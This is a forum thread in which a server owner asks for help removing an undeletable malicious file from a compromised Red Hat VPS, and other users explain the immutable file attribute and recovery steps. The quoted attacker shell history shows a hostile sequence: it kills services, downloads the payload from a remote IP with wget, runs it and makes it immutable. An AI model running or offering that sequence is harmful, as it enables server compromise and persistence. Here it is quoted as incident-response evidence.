Cant delete or chown file as a root

postcd · July 30, 2014, 2:28pm

Hello,

some hack script suddenly appear in the /root directory of my VPS. Lets call it “badscript”

-rwxr-xr-x 1 root root 1.2M Jul 18 12:34 badscript

but i cant delete it or chown it being root…

it says:

rm: cannot remove `badscript': Operation not permitted chown: changing ownership of `badscript': Operation not permitted

stat badscript

File: `badscript' Size: 1189151 Blocks: 2336 IO Block: 4096 regular file Device: 57h/87d Inode: 17932822 Links: 1 Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2014-07-29 16:51:30.000000000 -0400 Modify: 2014-07-18 12:34:49.000000000 -0400 Change: 2014-07-29 16:51:25.000000000 -0400

Please any idea how to block that person who added this script to my linux redhat server?

“last” command shows only my regular ips, no stranger ip

and how to remove that script? Thank you

chemicalfan · July 30, 2014, 3:29pm

I’d change the root password, stat.
The hacker must have it in order to write to that folder

chemicalfan · July 30, 2014, 3:33pm

I’d also reboot into single-user mode, in case there is some kind of zero-day privilege escalation bug.
Is the server fully updated?

postcd · July 30, 2014, 3:40pm

i changed root password and the server has no extra users, only those created during apache, mysql install
i have feeling that the server is compromised somehow from inside, not from outside someone logging it via ssh, the roor password was safe one.

the script was running like:
./badscript
/root/badscript

Mark_Greaves_PCNetSp · July 30, 2014, 4:50pm

OK, run:

cd /

then check the output from:

lsattr

if you see an “a” in the badscript extended attributes, like this:-

-----a-------e-- ./badscript

it’s flagged as “append only” … so run:

chattr -a badscript

to remove the append only extended attribute flag

Now try deleting it.

[EDIT]

An “i” flag (in the lsattr output) denotes the file is flagged as “immutable” … so remove that with:

chattr -i badscript

or both at the same time with:

chattr -i -a badscript

Info on extended attributes can be found here:
http://www.linuxintheshell.org/2013/04/23/episode-028-extended-attributes-lsattr-and-chattr/

postcd · July 30, 2014, 7:12pm

thx, when i run lsattrm it shows:

----i---------- ./badscript

cat /etc/passwd | grep root

[QUOTE]root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/sbin/nologin
[/quote]
Also thanks to command:
find /root -type f -name “*” -mtime -48

i found some modiffied files, amongs them:

/root/sent /root/badscript /root/conf.n /root/.mysql_history /root/.bash_history

cat /root/.bash_history

uname -a passwd ps - killall -9 httpd killall -9 pickup killall -9 qmgr killall -9 proftpd killall -9 xinetd wget http://192.161.*.*:1688/badscript chmod +x badscript ./badscript chattr +i badscript killall -9 sshpa

(i replaced ip by asterisks)

cat /root/.mysql_history

password show databases;

please any ideas? I already changed root password, and its not guessable one…

Mark_Greaves_PCNetSp · July 30, 2014, 7:44pm

See my edit above.

chattr -i badscript

(run as root)

then you should be able to delete it

postcd · July 30, 2014, 7:51pm

yes, thx, i already eliminated that script thanks to your command.
Please any other advices regarding things i posted before?

Mark_Greaves_PCNetSp · July 30, 2014, 8:03pm

Any ideas about what ?

Here’s an idea … recover from a known clean backup, then firewall off any SSH ports unless accessed over an openvpn connection authenticated by certificate

madpenguin · July 30, 2014, 10:52pm

If you could post a copy of “badscript” we could comment more???

postcd · July 31, 2014, 8:01am

Here is the link to VirusTotal.com analysis of the file: http://pastebin.com/mtMshTwR
Its unreadable file, code looks like some .exe or something